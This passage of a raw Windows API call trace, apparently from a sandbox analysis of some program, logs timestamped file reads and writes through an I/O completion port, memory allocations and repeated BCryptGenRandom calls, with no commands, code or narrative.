lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.026] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x332a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0153.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.030] CloseHandle (hObject=0x3cc) returned 1 [0153.030] free (_Block=0x3e70008) [0153.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.030] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x6bd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.120] CloseHandle (hObject=0x308) returned 1 [0153.120] free (_Block=0x3df0008) [0153.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.125] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa086, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.127] CloseHandle (hObject=0xec) returned 1 [0153.127] free (_Block=0x1ff1e60) [0153.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.145] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0153.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.145] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0153.145] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.145] free (_Block=0x3e305b8) [0153.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.145] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.146] free (_Block=0x1fa91d0) [0153.146] free (_Block=0x1fa2ed8) [0153.146] free (_Block=0x1fa90b8) [0153.146] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.146] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.152] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0153.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0153.154] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.154] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.154] free (_Block=0x3e305b8) [0153.154] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.154] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.154] free (_Block=0x1fa91d0) [0153.154] free (_Block=0x1fa2ed8) [0153.154] free (_Block=0x1fa90b8) [0153.154] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.160] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x3810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0153.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0153.185] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.185] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.185] free (_Block=0x3e305b8) [0153.185] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.185] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.185] free (_Block=0x1fa91d0) [0153.185] free (_Block=0x1fa2ed8) [0153.185] free (_Block=0x1fa90b8) [0153.185] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0153.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0153.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0153.195] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.195] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.195] free (_Block=0x3e305b8) [0153.195] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.195] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.195] free (_Block=0x1fa91d0) [0153.195] free (_Block=0x1fa2ed8) [0153.195] free (_Block=0x1fa90b8) [0153.195] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0153.196] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.215] CloseHandle (hObject=0x338) returned 1 [0153.215] free (_Block=0x3d70450) [0153.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0153.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0153.227] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.227] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.227] free (_Block=0x3e305b8) [0153.227] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.227] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.227] free (_Block=0x1fa91d0) [0153.227] free (_Block=0x1fa2ed8) [0153.228] free (_Block=0x1fa90b8) [0153.228] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0153.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0153.252] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.252] free (_Block=0x3e305b8) [0153.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.252] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.252] free (_Block=0x1fa91d0) [0153.253] free (_Block=0x1fa2ed8) [0153.253] free (_Block=0x1fa90b8) [0153.253] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0153.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.804] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1df8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.811] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xa410, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0153.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.835] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0153.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.850] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1476, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.881] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0153.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.885] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0153.885] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.889] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0153.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.896] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.014] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0154.015] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.026] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x6958, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.051] CloseHandle (hObject=0x2a8) returned 1 [0154.051] free (_Block=0x3e70008) [0154.051] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0154.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.065] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0154.065] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.065] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.065] free (_Block=0x3e305b8) [0154.065] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.066] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.066] free (_Block=0x1fa91d0) [0154.066] free (_Block=0x1fa2ed8) [0154.066] free (_Block=0x1fa90b8) [0154.066] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.067] CloseHandle (hObject=0x3cc) returned 1 [0154.067] free (_Block=0x3d70450) [0154.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.068] CloseHandle (hObject=0x338) returned 1 [0154.068] free (_Block=0x1ff1e60) [0154.068] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0154.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.108] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0154.109] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.109] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.109] free (_Block=0x3e305b8) [0154.109] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.109] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.109] free (_Block=0x1fa91d0) [0154.109] free (_Block=0x1fa2ed8) [0154.109] free (_Block=0x1fa90b8) [0154.109] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.110] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.110] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.110] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.122] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4330, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.386] CloseHandle (hObject=0x2a8) returned 1 [0154.386] free (_Block=0x3df0008) [0154.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0154.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0154.395] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.395] free (_Block=0x3e305b8) [0154.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.395] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.396] free (_Block=0x1fa91d0) [0154.396] free (_Block=0x1fa2ed8) [0154.396] free (_Block=0x1fa90b8) [0154.396] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0154.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, 